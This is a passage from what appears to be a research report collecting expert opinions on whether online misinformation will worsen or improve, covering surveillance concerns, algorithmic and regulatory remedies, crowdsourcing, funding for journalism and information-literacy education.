A **leading internet pioneer who has worked with the FCC, the UN’s International Telecommunication Union (ITU), the General Electric Co. (GE) and other major technology organizations **commented, “The ‘internet-as-weapon’ paradigm has emerged.”
**Dean Willis**, consultant for Softarmor Systems, commented, “Governments and political groups have now discovered the power of targeted misinformation coupled to personalized understanding of the targets. Messages can now be tailored with devastating accuracy. We’re doomed to living in targeted information bubbles.”
An **anonymous survey participant **noted, “Misinformation will play a major role in conflicts between nations and within competing parties within nation states.”
**danah boyd**, principal researcher at Microsoft Research and founder of Data & Society, wrote, “What’s at stake right now around information is epistemological in nature. Furthermore, information is a source of power and thus a source of contemporary warfare.”
**Peter Lunenfeld**, a professor at UCLA, commented, “For the foreseeable future, the economics of networks and the networks of economics are going to privilege the dissemination of unvetted, unverified and often weaponized information. Where there is a capitalistic incentive to provide content to consumers, and those networks of distribution originate in a huge variety of transnational and even extra-national economies and political systems, the ability to ‘control’ veracity will be far outstripped by the capability and willingness to supply any kind of content to any kind of user.”
These experts noted that the public has turned to social media – especially Facebook – to get its “news.” They said the public’s craving for quick reads and tabloid-style sensationalism is what makes social media the field of choice for manipulative narratives, which are often packaged to appear like news headlines. They note that the public’s move away from more-traditional mainstream news outlets, which had some ethical standards, to consumption of social newsfeeds has weakened mainstream media organizations, making them lower-budget operations that have been forced to compete for attention by offering up clickbait headlines of their own.
An **emeritus professor of communication for a U.S. Ivy League university** noted, “We have lost an important social function in the press. It is being replaced by social media, where there are few if any moral or ethical guidelines or constraints on the performance of informational roles.”
A** project leader for a science institute** commented, “We live in an era where most people get their ‘news’ via social media and it is very easy to spread fake news. The existence of clickbait sites make it easy for conspiracy theories to be rapidly spread by people who do not bother to read entire articles, nor look for trusted sources. Given that there is freedom of speech, I wonder how the situation can ever improve. Most users just read the headline, comment and share without digesting the entire article or thinking critically about its content (if they read it at all).”
#### Subtheme: The most-effective tech solutions to misinformation will endanger people’s dwindling privacy options, and they are likely to limit free speech and remove the ability for people to be anonymous online
The rise of new and highly varied voices with differing agendas and motivations might generally be considered to be a good thing. But some of these experts said the recent major successes by misinformation manipulators have created a threatening environment in which many in the public are encouraging platform providers and governments to expand surveillance. Among the technological solutions for “cleaning up” the information environment are those that work to clearly identify entities operating online and employ algorithms to detect misinformation. Some of these experts expect that such systems will act to identify perceived misbehaviors and label, block, filter or remove some online content and even ban some posters from further posting.
Increased censorship and mass surveillance will tend to create official ‘truths’ in various parts of the world. Retired professor
An **educator** commented, “Creating ‘a reliable, trusted, unhackable verification system’ would produce a system for filtering and hence *structuring* of content. This will end up being a censored information reality.”
An **eLearning specialist** observed, “Any system deeming itself to have the ability to ‘judge’ information as valid or invalid is inherently biased.” And a **professor and researcher** noted, “In an open society, there is no prior determination of what information is genuine or fake.”
In fact, a share of the respondents predicted that the online information environment will not improve in the next decade because any requirement for authenticated identities would take away the public’s highly valued free-speech rights and allow major powers to control the information environment.
A **distinguished professor emeritus of political science at a U.S. university** wrote, “Misinformation will continue to thrive because of the long (and valuable) tradition of freedom of expression. Censorship will be rejected.” An **anonymous respondent** wrote, “There is always a fight between ‘truth’ and free speech. But because the internet cannot be regulated free speech will continue to dominate, meaning the information environment will not improve.”
But another share of respondents said that is precisely why authenticated identities – which are already operating in some places, including China – *will* become a larger part of information systems. A **professor at a major U.S. university** replied, “Surveillance technologies and financial incentives will generate greater surveillance.” A **retired university professor** predicted, “Increased censorship and mass surveillance will tend to create official ‘truths’ in various parts of the world. In the United States, corporate filtering of information will impose the views of the economic elite.”
The **executive director of a major global privacy advocacy organization** argued removing civil liberties in order to stop misinformation will not be effective, saying, “‘Problematic’ actors will be able to game the devised systems while others will be over-regulated.”
Several other respondents also cited this as a major flaw of this potential remedy. They argued against it for several reasons, including the fact that it enables even broader government and corporate surveillance and control over more of the public.
**Emmanuel Edet**, head of legal services at the National Information Technology Development Agency of Nigeria, observed, “The information environment will improve but at a cost to privacy.”
[or]
**James LaRue**, director of the Office for Intellectual Freedom of the American Library Association, commented, “Information systems incentivize getting attention. Lying is a powerful way to do that. To stop that requires high surveillance – which means government oversight which has its own incentives not to tell the truth.”
**Tom Valovic**, contributor to The Technoskeptic magazine and author of “Digital Mythologies,” said encouraging platforms to exercise algorithmic controls is not optimal. He wrote: “Artificial intelligence that will supplant human judgment is being pursued aggressively by entities in the Silicon Valley and elsewhere. Algorithmic solutions to replacing human judgment are subject to hidden bias and will ultimately fail to accomplish this goal. They will only continue the centralization of power in a small number of companies that control the flow of information.”
### Theme 3: The information environment will improve because technology will help label, filter or ban misinformation and thus upgrade the public’s ability to judge the quality and veracity of content
Most of the respondents who gave hopeful answers about the future of truth online said they believe technology will be implemented to improve the information environment. They noted their faith was grounded in history, arguing that humans have always found ways to innovate to overcome problems. Most of these experts do not expect there will be a perfect system – but they expect advances. A number said information platform corporations such as Google and Facebook will begin to efficiently police the environment to embed moral and ethical thinking in the structure of their platforms. They hope this will simultaneously enable the screening of content while still protecting rights such as free speech.
If there is a great amount of pressure from the industry to solve this problem (which there is), then methodologies will be developed and progress will be made … In other words, if there’s a will, there’s way. Adam Lella
**Larry Diamond**, senior fellow at the Hoover Institution and the Freeman Spogli Institute (FSI) at Stanford University, said, “I am hopeful that the principal digital information platforms will take creative initiatives to privilege more authoritative and credible sources and to call out and demote information sources that appear to be propaganda and manipulation engines, whether human or robotic. In fact, the companies are already beginning to take steps in this direction.”
An **associate professor at a U.S. university** wrote, “I do not see us giving up on seeking truth.” And a **researcher **based in Europe said, “Technologies will appear that solve the trust issues and reward logic.”
**Adam Lella**, senior analyst for marketing insights at comScore Inc., replied, “There have been numerous other industry-related issues in the past (e.g., viewability, invalid traffic detection, cross-platform measurement) that were seemingly impossible to solve, and yet major progress was made in the past few years. If there is a great amount of pressure from the industry to solve this problem (which there is), then methodologies will be developed and progress will be made to help mitigate this issue in the long run. In other words, if there’s a will, there’s way.”
#### Subtheme: Likely tech-based solutions include adjustments to algorithmic filters, browsers, apps and plug-ins and the implementation of “trust ratings”
Many respondents who hope for improvement in the information environment mentioned ways in which new technological solutions might be implemented.
**Bart Knijnenburg**, researcher on decision-making and recommender systems and assistant professor of computer science at Clemson University, said, “Two developments will help improve the information environment: 1) News will move to a subscription model (like music, movies, etc.) and subscription providers will have a vested interest in culling down false narratives; 2) Algorithms that filter news will learn to discern the quality of a news item and not just tailor to ‘virality’ or political leaning.”
In order to reduce the spread of fake news, we must deincentivize it financially. Amber Case
**Laurel Felt**, lecturer at the University of Southern California, “There will be mechanisms for flagging suspicious content and providers and then apps and plugins for people to see the ‘trust rating’ for a piece of content, an outlet or even an IP address. Perhaps people can even install filters so that, when they’re doing searches, hits that don’t meet a certain trust threshold will not appear on the list.”
A **longtime U.S. government researcher and administrator in communications and technology sciences** said, “The intelligence, defense and related U.S. agencies are very actively working on this problem and results are promising.”
**Amber Case**, research fellow at Harvard University’s Berkman Klein Center for Internet & Society, suggested withholding ad revenue until veracity has been established. She wrote, “Right now, there is an incentive to spread fake news. It is profitable to do so, profit made by creating an article that causes enough outrage that advertising money will follow. … In order to reduce the spread of fake news, we must deincentivize it financially. If an article bursts into collective consciousness and is later proven to be fake, the sites that control or host that content could refuse to distribute advertising revenue to the entity that created or published it. This would require a system of delayed advertising revenue distribution where ad funds are held until the article is proven as accurate or not. A lot of fake news is created by a few people, and removing their incentive could stop much of the news postings.”
**Andrea Matwyshyn**, a professor of law at Northeastern University who researches innovation and law, particularly information security, observed, “Software liability law will finally begin to evolve. Market makers will increasingly incorporate security quality as a factor relevant to corporate valuation. The legal climate for security research will continue to improve, as its connection to national security becomes increasingly obvious. These changes will drive significant corporate and public sector improvements in security during the next decade.”
**Larry Keeley**, founder of innovation consultancy Doblin, predicted technology will be improved but people will remain the same, writing, “Capabilities adapted from both bibliometric analytics and good auditing practices will make this a solvable problem. However, non-certified, compelling-but-untrue information will also proliferate. So the new divide will be between the people who want their information to be real vs. those who simply want it to *feel* important. Remember that quote from Roger Ailes: ‘People don’t want to BE informed, they want to FEEL informed.’ Sigh.”
**Anonymous survey participants also responded: **** **
- “Filters and algorithms will improve to both verify raw data, separate ‘overlays’ and to correct for a feedback loop.”
- “Semantic technologies will be able to cross-verify statements, much like meta-analysis.”
- “The credibility history of each individual will be used to filter incoming information.”
- “The veracity of information will be linked to how much the source is perceived as trustworthy – we may, for instance, develop a trust index and trust will become more easily verified using artificial-intelligence-driven technologies.”
- “The work being done on things like verifiable identity and information sharing through loose federation will improve things somewhat (but not completely). That is to say, things will become better but not necessarily good.”
- “AI, blockchain, crowdsourcing and other technologies will further enhance our ability to filter and qualify the veracity of information.”
- “There will be new visual cues developed to help news consumers distinguish between trusted news sources and others.”
#### Subtheme: Regulatory remedies could include software liability law, required identities, unbundling of social networks like Facebook
A number of respondents believe there will be policy remedies that move beyond whatever technical innovations emerge in the next decade. They offered a range of suggestions, from regulatory reforms applied to the platforms that aid misinformation merchants to legal penalties applied to wrongdoers. Some think the threat of regulatory reform via government agencies may force the issue of required identities and the abolition of anonymity protections for platform users.
**Sonia Livingstone**, professor of social psychology at the London School of Economics and Political Science, replied, “The ‘wild west’ state of the internet will not be permitted to continue by those with power, as we are already seeing with increased national pressure on providers/companies by a range of means from law and regulation to moral and consumer pressures.”
**Willie Currie**, a longtime expert in global communications diffusion, wrote, “The apparent success of fake news on platforms like Facebook will have to be dealt with on a regulatory basis as it is clear that technically minded people will only look for technical fixes and may have incentives not to look very hard, so self-regulation is unlikely to succeed. The excuse that the scale of posts on social media platforms makes human intervention impossible will not be a defense. Regulatory options may include unbundling social networks like Facebook into smaller entities. Legal options include reversing the notion that providers of content services over the internet are mere conduits without responsibility for the content. These regulatory and legal options may not be politically possible to affect within the U.S., but they are certainly possible in Europe and elsewhere, especially if fake news is shown to have an impact on European elections.”
**Sally Wentworth**, vice president of global policy development at the Internet Society, warned against too much dependence upon information platform providers in shaping solutions to improve the information environment. She wrote: “It’s encouraging to see some of the big platforms beginning to deploy internet solutions to some of the issues around online extremism, violence and fake news. And yet, it feels like as a society, we are outsourcing this function to private entities that exist, ultimately, to make a profit and not necessarily for a social good. How much power are we turning over to them to govern our social discourse? Do we know where that might eventually lead? On the one hand, it’s good that the big players are finally stepping up and taking responsibility. But governments, users and society are being too quick to turn all of the responsibility over to internet platforms. Who holds them accountable for the decisions they make on behalf of all of us? Do we even know what those decisions are?”
A **professor and chair in a department of educational theory, policy and administration** commented, “Some of this work can be done in private markets. Being banned from social media is one obvious one. In terms of criminal law, I think the important thing is to have penalties/regulations be domain-specific. Speech can be regulated in certain venues, but obviously not in all. Federal (and perhaps even international) guidelines would be useful. Without a framework for regulation, I can’t imagine penalties.”
### Theme 4: The information environment will improve, because people will adjust and make things better
Many of those who expect the information environment to improve anticipate that information literacy training and other forms of assistance will help people become more sophisticated consumers. They expect that users will gravitate toward more reliable information – and that knowledge providers will respond in kind.
When the television became popular, people also believed everything on TV was true. It’s how people choose to react and access to information and news that’s important, not the mechanisms that distribute them. Irene Wu
**Frank Kaufmann**, founder and director of several international projects for peace activism and media and information, commented, “The quality of news will improve, because things always improve.” And **Barry Wellman**, virtual communities expert and co-director of the NetLab Network, said, “Software and people are becoming more sophisticated.”
One hopeful respondent said a change in economic incentives can bring about desired change. **Tom Wolzien**, chairman of The Video Call Center and Wolzien LLC, said, “The market will not clean up the bad material, but will shift focus and economic rewards toward the reliable. Information consumers, fed up with false narratives, will increasingly shift toward more-trusted sources, resulting in revenue flowing toward those more trusted sources and away from the junk. This does not mean that all people will subscribe to either scientific or journalistic method (or both), but they will gravitate toward material the sources and institutions they find trustworthy, and those institutions will, themselves, demand methods of verification beyond those they use today.”
A **retired public official and internet pioneer** predicted, “1) Education for veracity will become an indispensable element of secondary school. 2) Information providers will become legally responsible for their content. 3) A few trusted sources will continue to dominate the internet.”
**Irene Wu**, adjunct professor of communications, culture and technology at Georgetown University, said, “Information will improve because people will learn better how to deal with masses of digital information. Right now, many people naively believe what they read on social media. When the television became popular, people also believed everything on TV was true. It’s how people choose to react and access to information and news that’s important, not the mechanisms that distribute them.”
**Charlie Firestone**, executive director at the Aspen Institute Communications and Society Program, commented, “In the future, tagging, labeling, peer recommendations, new literacies (media, digital) and similar methods will enable people to sift through information better to find and rely on factual information. In addition, there will be a reaction to the prevalence of false information so that people are more willing to act to assure their information will be accurate.”
**Howard Rheingold**, pioneer researcher of virtual communities, longtime professor and author of “Net Smart: How to Thrive Online,” noted, “As I wrote in ‘Net Smart’ in 2012, some combination of education, algorithmic and social systems can help improve the signal-to-noise ratio online – with the caveat that misinformation/disinformation versus verified information is likely to be a continuing arms race. In 2012, Facebook, Google and others had no incentive to pay attention to the problem. After the 2016 election, the issue of fake information has been spotlighted.”
#### Subtheme: Misinformation has always been with us and people have found ways to lessen its impact. The problems will become more manageable as people become more adept at sorting through material
Many respondents agree that misinformation will persist as the online realm expands and more people are connected in more ways. Still, the more hopeful among these experts argue that progress is inevitable as people and organizations find coping mechanisms. They say history validates this. Furthermore, they said technologists will play an important role in helping filter out misinformation and modeling new digital literacy practices for users.
We were in this position before, when printing presses broke the existing system of information management. A new system emerged and I believe we have the motivation and capability to do it again. Jonathan Grudin
**Mark Bunting**, visiting academic at Oxford Internet Institute, a senior digital strategy and public policy advisor with 16 years of experience at the BBC and as a digital consultant, wrote, “Our information environment has been immeasurably improved by the democratisation of the means of publication since the creation of the web nearly 25 years ago. We are now seeing the downsides of that transformation, with bad actors manipulating the new freedoms for antisocial purposes, but techniques for managing and mitigating those harms will improve, creating potential for freer, but well-governed, information environments in the 2020s.”
**Jonathan Grudin**, principal design researcher at Microsoft, said, “We were in this position before, when printing presses broke the existing system of information management. A new system emerged and I believe we have the motivation and capability to do it again. It will again involve information channeling more than misinformation suppression; contradictory claims have always existed in print, but have been manageable and often healthy.”
**Judith Donath**, fellow at Harvard University’s Berkman Klein Center for Internet & Society and founder of the Sociable Media Group at the MIT Media Lab, wrote, “‘Fake news’ is not new. The Weekly World News had a circulation of over a million for its mostly fictional news stories that are printed and sold in a format closely resembling a newspaper. Many readers recognized it as entertainment, but not all. More subtly, its presence on the newsstand reminded everyone that anything can be printed.”
**Joshua Hatch**, president of the Online News Association, noted, “I’m slightly optimistic because there are more people who care about doing the right thing than there are people who are trying to ruin the system. Things will improve because people – individually and collectively – will make it so.”
Many of these respondents said the leaders and engineers of the major information platform companies will play a significant role. Some said they expect some other systematic and social changes will alter things.
**John Wilbanks**, chief commons officer at Sage Bionetworks, replied, “I’m an optimist, so take this with a grain of salt, but I think as people born into the internet age move into positions of authority they’ll be better able to distill and discern fake news than those of us who remember an age of trusted gatekeepers. They’ll be part of the immune system. It’s not that the environment will get better, it’s that those younger will be better fitted to survive it.”
**Danny Rogers**, founder and CEO of Terbium Labs, replied, “Things always improve. Not monotonically, and not without effort, but fundamentally, I still believe that the efforts to improve the information environment will ultimately outweigh efforts to devolve it.”
**Bryan Alexander**, futurist and president of Bryan Alexander Consulting, replied, “Growing digital literacy and the use of automated systems will tip the balance towards a better information environment.”
A number of these respondents said information platform corporations such as Google and Facebook will begin to efficiently police the environment through various technological enhancements. They expressed faith in the inventiveness of these organizations and suggested the people of these companies will implement technology to embed moral and ethical thinking in the structure and business practices of their platforms, enabling the screening of content while still protecting rights such as free speech.
**Patrick Lambe**, principal consultant at Straits Knowledge, commented, “All largescale human systems are adaptive. When faced with novel predatory phenomena, counter-forces emerge to balance or defeat them. We are at the beginning of a largescale negative impact from the undermining of a social sense of reliable fact. Counter-forces are already emerging. The presence of largescale ‘landlords’ controlling significant sections of the ecosystem (e.g., Google, Facebook) aids in this counter-response.”
A **professor in technology law at a West-Coast-based U.S. university** said, “Intermediaries such as Facebook and Google will develop more-robust systems to reward legitimate producers and punish purveyors of fake news.”
A** longtime director for Google** commented, “Companies like Google and Facebook are investing heavily in coming up with usable solutions. Like email spam, this problem can never entirely be eliminated, but it can be managed.”
**Sandro Hawke**, technical staff at the World Wide Web Consortium, predicted, “Things are going to get worse before they get better, but humans have the basic tools to solve this problem, so chances are good that we will. The biggest risk, as with many things, is that narrow self-interest stops people from effectively collaborating.”
**Anonymous respondents shared these remarks:**
- “Accurate facts are essential, particularly within a democracy, so this will be a high, shared value worthy of investment and government support, as well as private-sector initiatives.”
- “We are only at the beginning of drastic technological and societal changes. We will learn and develop strategies to deal with problems like fake news.”
- “There is a long record of innovation taking place to solve problems. Yes, sometimes innovation leads to abuses, but further innovation tends to solve those problems.”
- Consumers have risen up in the past to block the bullshit, fake ads, fake investment scams, etc., and they will again with regard to fake news.”
- “As we understand more about digital misinformation we will design better tools, policies and opportunities for collective action.”
- “Now that it is on the agenda, smart researchers and technologists will develop solutions.”
- “The increased awareness of the issue will lead to/force new solutions and regulation that will improve the situation in the long-term even if there are bound to be missteps such as flawed regulation and solutions along the way.”
#### Subtheme: Crowdsourcing will work to highlight verified facts and block those who propagate lies and propaganda. Some also have hopes for distributed ledgers (blockchain)
A number of these experts said solutions such as tagging, flagging or other labeling of questionable content will continue to expand and be of further use in the future in tackling the propagation of misinformation
The future will attach credibility to the source of any information. The more a given source is attributed to ‘fake news,’ the lower it will sit in the credibility tree. Anonymous engineer
**J. Nathan Matias**, a postdoctoral researcher at Princeton University and previously a visiting scholar at MIT’s Center for Civic Media, wrote, “Through ethnography and largescale social experiments, I have been encouraged to see volunteer communities with tens of millions of people work together to successfully manage the risks from inaccurate news.”
A **researcher of online harassment working for a major internet information platform **commented, “If there are nonprofits keeping technology in line, such as an ACLU-esque initiative, to monitor misinformation and then partner with spaces like Facebook to deal with this kind of news spam, then yes, the information environment will improve. We also need to move away from clickbaity-like articles, and not algorithmically rely on popularity but on information.”
An **engineer based in North America** replied, “The future will attach credibility to the source of any information. The more a given source is attributed to ‘fake news,’ the lower it will sit in the credibility tree.”
**Micah Altman**, director of research for the Program on Information Science at MIT, commented, “Technological advances are creating forces pulling in two directions: It is increasingly easy to create real-looking fake information; and it is increasingly easy to crowdsource the collection and verification of information. In the longer term, I’m optimistic that the second force will dominate – as transaction cost-reduction appears to be relatively in favor of crowds versus concentrated institutions.”
[The information environment]
Some predicted that digital distributed ledger technologies, known as blockchain, may provide some answers. A longtime **technology editor and columnist based in Europe**, commented, “The blockchain approach used for Bitcoin, etc., could be used to distribute content. DECENT is an early example.” And an **anonymous respondent** **from Harvard University’s Berkman Klein Center for Internet & Society **said, “They will be cryptographically verified, with concepts.”
[is]
A **professor of media and communication based in Europe** said, “Right now, reliable and trusted verification systems are not yet available; they may become technically available in the future but the arms race between corporations and hackers is never ending. Blockchain technology may be an option, but every technological system needs to be built on trust, and as long as there is no globally governed trust system that is open and transparent, there will be no reliable verification systems.”
### Theme 5: Tech can’t win the battle. The public must fund and support the production of objective, accurate information. It must also elevate information literacy to be a primary goal of education
There was common agreement among many respondents – whether they said they expect to see improvements in the information environment in the next decade or not – that the problem of misinformation requires significant attention. A share of these respondents urged action in two areas: A bolstering of the public-serving press and an expansive, comprehensive, ongoing information literacy education effort for people of all ages.
We can’t machine-learn our way out of this disaster, which is actually a perfect storm of poor civics knowledge and poor information literacy. Mike DeVito
A **sociologist doing research on technology and civic engagement at MIT** said, “Though likely to get worse before it gets better, the 2016-2017 information ecosystem problems represent a watershed moment and call to action for citizens, policymakers, journalists, designers and philanthropists who must work together to address the issues at the heart of misinformation.”
**Michael Zimmer,** associate professor and privacy and information ethics scholar at the University of Wisconsin, Milwaukee commented, “This is a social problem that cannot be solved via technology.”
#### Subtheme: Funding and support must be directed to the restoration of a well-fortified, ethical and trusted public press
Many respondents noted that while the digital age has amplified countless information sources it has hurt the reach and influence of the traditional news organizations. These are the bedrock institutions much of the public has relied upon for objective, verified, reliable information – information undergirded by ethical standards and a general goal of serving the common good. These respondents said the information environment can’t be improved without more, well-staffed, financially stable, independent news organizations. They believe that material can rise above misinformation and create a base of “common knowledge” the public can share and act on.
This is a wake-up call to the news industry, policy makers and journalists to refine the system of news production. Rich Ling
**Susan Hares**, a pioneer with the National Science Foundation Network (NSFNET) and longtime internet engineering strategist, now a consultant, said, “Society simply needs to decide that the ‘press’ no longer provides unbiased information, and it must pay for unbiased and verified information.”
**Christopher Jencks**, a professor emeritus at Harvard University, said, “Reducing ‘fake news’ requires a profession whose members share a commitment to getting it right. That, in turn, requires a source of money to pay such professional journalists. Advertising used to provide newspapers with money to pay such people. That money is drying up, and it seems unlikely to be replaced within the next decade.”
**Rich Ling**, professor of media technology at the School of Communication and Information at Nanyang Technological University, said, “We have seen the consequences of fake news in the U.S. presidential election and Brexit. This is a wake-up call to the news industry, policy makers and journalists to refine the system of news production.”
**Maja Vujovic**, senior copywriter for the Comtrade Group, predicted, “The information environment will be increasingly perceived as a public good, making its reliability a universal need. Technological advancements and civil-awareness efforts will yield varied ways to continuously purge misinformation from it, to keep it reasonably reliable.”
An **author and journalist based in North America** said, “I believe this era could spawn a new one – a flight to quality in which time-starved citizens place high value on verified news sources.”
A **professor of law at a major U.S. state university** commented, “Things won’t get better until we realize that accurate news and information are a public good that require not-for-profit leadership and public subsidy.”
**Marc Rotenberg**, president of the Electronic Privacy Information Center, wrote, “The problem with online news is structural: There are too few gatekeepers, and the internet business model does not sustain quality journalism. The reason is simply that advertising revenue has been untethered from news production.”
With precarious funding and shrinking audiences, healthy journalism that serves the common good is losing its voice. **Siva Vaidhyanathan**, professor of media studies and director of the Center for Media and Citizenship at the University of Virginia, wrote, “There are no technological solutions that correct for the dominance of Facebook and Google in our lives. These incumbents are locked into monopoly power over our information ecosystem and as they drain advertising money from all other low-cost commercial media they impoverish the public sphere.”
#### Subtheme: Elevate information literacy: It must become a primary goal at all levels of education
Many of these experts said the flaws in human nature and still-undeveloped norms in the digital age are the key problems that make users susceptible to false, misleading and manipulative online narratives. One potential remedy these respondents suggested is a massive compulsory crusade to educate all in digital-age information literacy. Such an effort, some said, might prepare more people to be wise in what they view/read/believe and possibly even serve to upgrade the overall social norms of information sharing.
Information is only as reliable as the people who are receiving it. Julia Koller
**Karen Mossberger**, professor and director of the School of Public Affairs at Arizona State University, wrote, “The spread of fake news is not merely a problem of bots, but part of a larger problem of whether or not people exercise critical thinking and information-literacy skills. Perhaps the surge of fake news in the recent past will serve as a wake-up call to address these aspects of online skills in the media and to address these as fundamental educational competencies in our education system. Online information more generally has an almost limitless diversity of sources, with varied credibility. Technology is driving this issue, but the fix isn’t a technical one alone.”
**Mike DeVito**, graduate researcher at Northwestern University, wrote, “These are not technical problems; they are human problems that technology has simply helped scale, yet we keep attempting purely technological solutions. We can’t machine-learn our way out of this disaster, which is actually a perfect storm of poor civics knowledge and poor information literacy.”
**Miguel Alcaine**, International Telecommunication Union area representative for Central America, commented, “The boundaries between online and offline will continue to blur. We understand online and offline are different modalities of real life. There is and will be a market (public and private providers) for trusted information. There is and will be space for misinformation. The most important action societies can take to protect people is education, information and training.”
An **early internet developer and security consultant** commented, “Fake news is not a product of a flaw in the communications channel and cannot be fixed by a fix to the channel. It is due to a flaw in the human consumers of information and can be repaired only by education of those consumers.”
An **anonymous respondent from the Harvard University’s Berkman Klein Center ****for Internet & Society **noted, “False information – intentionally or inadvertently so – is neither new nor the result of new technologies. It may now be easier to spread to more people more quickly, but the responsibility for sifting facts from fiction has always sat with the person receiving that information and always will.”
An **internet pioneer and rights activist based in the Asia/Pacific region** said, “We as a society are not investing enough in education worldwide. The environment will only improve if both sides of the communication channel are responsible. The reader and the producer of content, both have responsibilities.”
**Deirdre Williams**, retired internet activist, replied, “Human beings are losing their capability to question and to refuse. Young people are growing into a world where those skills are not being taught.”
**Julia Koller**, a learning solutions lead developer, replied, “Information is only as reliable as the people who are receiving it. If readers do not change or improve their ability to seek out and identify reliable information sources, the information environment will not improve.”
**Ella Taylor-Smith**, senior research fellow at the School of Computing at Edinburgh Napier University, noted, “As more people become more educated, especially as digital literacy becomes a popular and respected skill, people will favour (and even produce) better quality information.”
**Constance Kampf**, a researcher in computer science and mathematics, said, “The answer depends on socio-technical design – these trends of misinformation versus verifiable information were already present before the internet, and they are currently being amplified. The state and trends in education and place of critical thinking in curricula across the world will be the place to look to see whether or not the information environment will improve – cyberliteracy relies on basic information literacy, social literacy and technological literacy. For the environment to improve, we need substantial improvements in education systems across the world in relation to critical thinking, social literacy, information literacy, and cyberliteracy (see Laura Gurak’s book ‘Cyberliteracy’).”
**Su Sonia Herring**, an editor and translator, commented, “Misinformation and fake news will exist as long as humans do; they have existed ever since language was invented. Relying on algorithms and automated measures will result in various unwanted consequences. Unless we equip people with media literacy and critical-thinking skills, the spread of misinformation will prevail.”
**Responses from additional key experts regarding the future of the information environment **
This section features responses by several of the top analysts who participated in this canvassing. Following this wide-ranging set of comments is a much more expansive set of quotations directly tied to the five primary themes identified in this report.
#### Ignorance breeds frustration and ‘a growing fraction of the population has neither the skills nor the native intelligence to master growing complexity’
**Mike Roberts**, pioneer leader at ICANN and Internet Hall of Fame member, replied, “There are complex forces working both to improve the quality of information on the net, and to corrupt it. I believe the outrage resulting from recent events will, on balance, lead to a net improvement, but viewed with hindsight, the improvement may be viewed as inadequate. The other side of the complexity coin is ignorance. The average man or woman in America today has less knowledge of the underpinnings of his or her daily life than they did 50 or a hundred years ago. There has been a tremendous insertion of complex systems into many aspects of how we live in the decades since World War II, fueled by a tremendous growth in knowledge in general. Even among highly intelligent people, there is a significant growth in personal specialization in order to trim the boundaries of expected expertise to manageable levels. Among educated people, we have learned mechanisms for coping with complexity. We use what we know of statistics and probability to compartment uncertainty. We adopt ‘most likely’ scenarios for events of which we do not have detailed knowledge, and so on. A growing fraction of the population has neither the skills nor the native intelligence to master growing complexity, and in a competitive social environment, obligations to help our fellow humans go unmet. Educated or not, no one wants to be a dummy – all the wrong connotations. So ignorance breeds frustration, which breeds acting out, which breeds antisocial and pathological behavior, such as the disinformation, which was the subject of the survey, and many other undesirable second order effects. Issues of trustable information are certainly important, especially since the technological intelligentsia command a number of tools to combat untrustable info. But the underlying pathology won’t be tamed through technology alone. We need to replace ignorance and frustration with better life opportunities that restore confidence – a tall order and a tough agenda. Is there an immediate nexus between widespread ignorance and corrupted information sources? Yes, of course. In fact, there is a virtuous circle where acquisition of trustable information reduces ignorance, which leads to better use of better information, etc.”
#### The truth of news is murky and multifaceted
**Judith Donath**, fellow at Harvard University’s Berkman Klein Center for Internet & Society and founder of the Sociable Media Group at the MIT Media Lab, wrote, “Yes, trusted methods will emerge to block false narratives and allow accurate information to prevail, and, yes, the quality and veracity of information online will deteriorate due to the spread of unreliable, sometimes even dangerous, socially destabilizing ideas. Of course, the definition of ‘true’ is sometimes murky. Experimental scientists have many careful protocols in place to assure the veracity of their work, and the questions they ask have well-defined answers – and still there can be controversy about what is true, what work was free from outside influence. The truth of news stories is far murkier and multi-faceted. A story can be distorted, disproportional, meant to mislead – and still, strictly speaking, factually accurate. … But a pernicious harm of fake news is the doubt it sows about the reliability of all news. Donald Trump’s repeated ‘fake news’ smears of The New York Times, Washington Post, etc., are among his most destructive non-truths.”
#### “Algorithms weaponize rhetoric,” influencing on a mass scale
**Susan Etlinger**, industry analyst at Altimeter Research, said, “There are two main dynamics at play: One is the increasing sophistication and availability of machine learning algorithms and the other is human nature. We’ve known since the ancient Greeks and Romans that people are easily persuaded by rhetoric; that hasn’t changed much in two thousand years. Algorithms weaponize rhetoric, making it easier and faster to influence people on a mass scale. There are many people working on ways to protect the integrity and reliability of information, just as there are cybersecurity experts who are in a constant arms race with cybercriminals, but to put as much emphasis on ‘information’ (a public good) as ‘data’ (a personal asset) will require a pretty big cultural shift. I suspect this will play out differently in different parts of the world.”
#### There’s no technical solution for the fact that ‘news’ is a social bargain
**Clay Shirky**, vice provost for educational technology at New York University, replied, “‘News’ is not a stable category – it is a social bargain. There’s no technical solution for designing a system that prevents people from asserting that Obama is a Muslim but allows them to assert that Jesus loves you.”
#### ‘Strong economic forces are incentivizing the creation and spread of fake news’
**Amy Webb**, author and founder of the Future Today Institute, wrote, “In an era of social, democratized media, we’ve adopted a strange attitude. We’re simultaneously skeptics and true believers. If a news story reaffirms what we already believe, it’s credible – but if it rails against our beliefs, it’s fake. We apply that same logic to experts and sources quoted in stories. With our limbic systems continuously engaged, we’re more likely to pay attention to stories that make us want to fight, take flight or fill our social media accounts with links. As a result, there are strong economic forces incentivizing the creation and spread of fake news. In the digital realm, attention is currency. It’s good for democracy to stop the spread of misinformation, but it’s bad for business. Unless significant measures are taken in the present – and unless all the companies in our digital information ecosystem use strategic foresight to map out the future – I don’t see how fake news could possibly be reduced by 2027.”
#### Propagandists exploit whatever communications channels are available
**Ian Peter**, internet pioneer, historian and activist, observed, “It is not in the interests of either the media or the internet giants who propagate information, nor of governments, to create a climate in which information cannot be manipulated for political, social or economic gain. Propaganda and the desire to distort truth for political and other ends have always been with us and will adapt to any form of new media which allows open communication and information flows.”
#### Expanding information outlets erode opportunities for a ‘common narrative’
[‘There are three kinds of lies: lies, damned lies and statistics.’]
#### ‘Broken as it might be, the internet is still capable of routing around damage’
**Paul Saffo**, longtime Silicon-Valley-based technology forecaster, commented, “The information crisis happened in the shadows. Now that the issue is visible as a clear and urgent danger, activists and people who see a business opportunity will begin to focus on it. Broken as it might be, the internet is still capable of routing around damage.”
#### It will be impossible to distinguish between fake and real video, audio, photos
**Marina Gorbis**, executive director of the Institute for the Future, predicted, “It’s not going to be better or worse but very different. Already we are developing technologies that make it impossible to distinguish between fake and real video, fake and real photographs, etc. We will have to evolve new tools for authentication and verification. We will probably have to evolve both new social norms as well as regulatory mechanisms if we want to maintain online environment as a source of information that many people can rely on.”
#### A ‘Cambrian explosion’ of techniques will arise to monitor the web and non-web sources
**Stowe Boyd**, futurist, publisher and editor-in-chief of Work Futures, said, “The rapid rise of AI will lead to a Cambrian explosion of techniques to monitor the web and non-web media sources and social networks and rapidly identifying and tagging fake and misleading content.”
